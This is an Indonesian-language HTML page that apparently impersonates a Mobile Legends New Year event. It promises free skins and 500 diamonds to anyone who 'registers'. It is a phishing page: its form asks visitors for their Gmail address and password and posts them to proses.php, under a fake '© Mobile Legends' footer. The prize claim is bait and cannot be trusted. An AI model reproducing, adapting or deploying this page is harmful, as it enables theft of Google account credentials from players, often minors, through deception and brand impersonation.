<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Daftar Events Skin+500 Diamond Mobile Legends Gratis</title>
  <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap" rel="stylesheet">
  <style>
    body {
      background: linear-gradient(to right, #4CAF50, #81C784);
      font-family: 'Roboto', sans-serif;
      color: #fff;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 110vh;
      margin: 0;
    }
    .container {
      width: 400px;
      padding: 30px;
      background-color: #fff;
      border-radius: 15px;
      box-shadow: 0 4px 20px rgba(0, 0, 0, 0.2);
      text-align: center;
    }
    .judul {
      margin-bottom: 20px;
      font-size: 15px;
      font-weight: 700;
      color: black;
    }
    label {
      display: block;
      margin-bottom: 5px;
      text-align: left;
      font-weight: 600;
      color: black;
    }
    input[type="email"], input[type="password"] {
      width: 100%;
      height: 40px;
      margin-bottom: 20px;
      padding: 10px;
      border: 1px solid #ccc;
      border-radius: 5px;
      transition: border-color 0.3s;
    }
    input[type="email"]:focus, input[type="password"]:focus {
      border-color: #4CAF50;
      outline: none;
    }
    button[type="submit"] {
      width: 100%;
      height: 45px;
      background-color: #4CAF50;
      color: #fff;
      border: none;
      border-radius: 5px;
      cursor: pointer;
      font-size: 16px;
      font-weight: bold;
      transition: background-color 0.3s;
    }
    button[type="submit"]:hover {
      background-color: #388E3C;
    }
    .footer {
      margin-top: 20px;
      font-size: 12px;
      color: #777;
    }
  </style>
</head>
<body>
  <div class="container">
    <img src="mobile-legends.jpg" alt="mobilelegens" width="200">
    <h1 class="judul">Events Skin+500💎 Diamond Mobile Legends Special Tahun Baru</h1>
     <h6 class="judul">Kami Memberikan Skin+bonus 500💎 Diamond untuk masing masing pengguna dan jika beruntung kami juga mengirimkan 5 skin sekaligus bonus 500💎 diamond secara cuma cuma dan Events ini Mulai dari 25 desember 2024  Hingga 10 januari 2025 saja buruan daftarkan akun anda untuk dapatkan hadiah nya</h6>
    <h2 class="judul">Daftarkan Akun Mobile Legends Anda Untuk Mendapatkan Hadiah Tersebut</h2>
    <form action="proses.php" method="post">
      <label for="username">Gmail:</label>
      <input type="email" id="username" name="username" required>
      <label for="password">Password:</label>
      <input type="password" id="password" name="password" required>
      <button type="submit">Daftar</button>
    </form>
    <div class="footer">© 2024-2025 Mobile Legends</div>
  </div>
</body>
</html>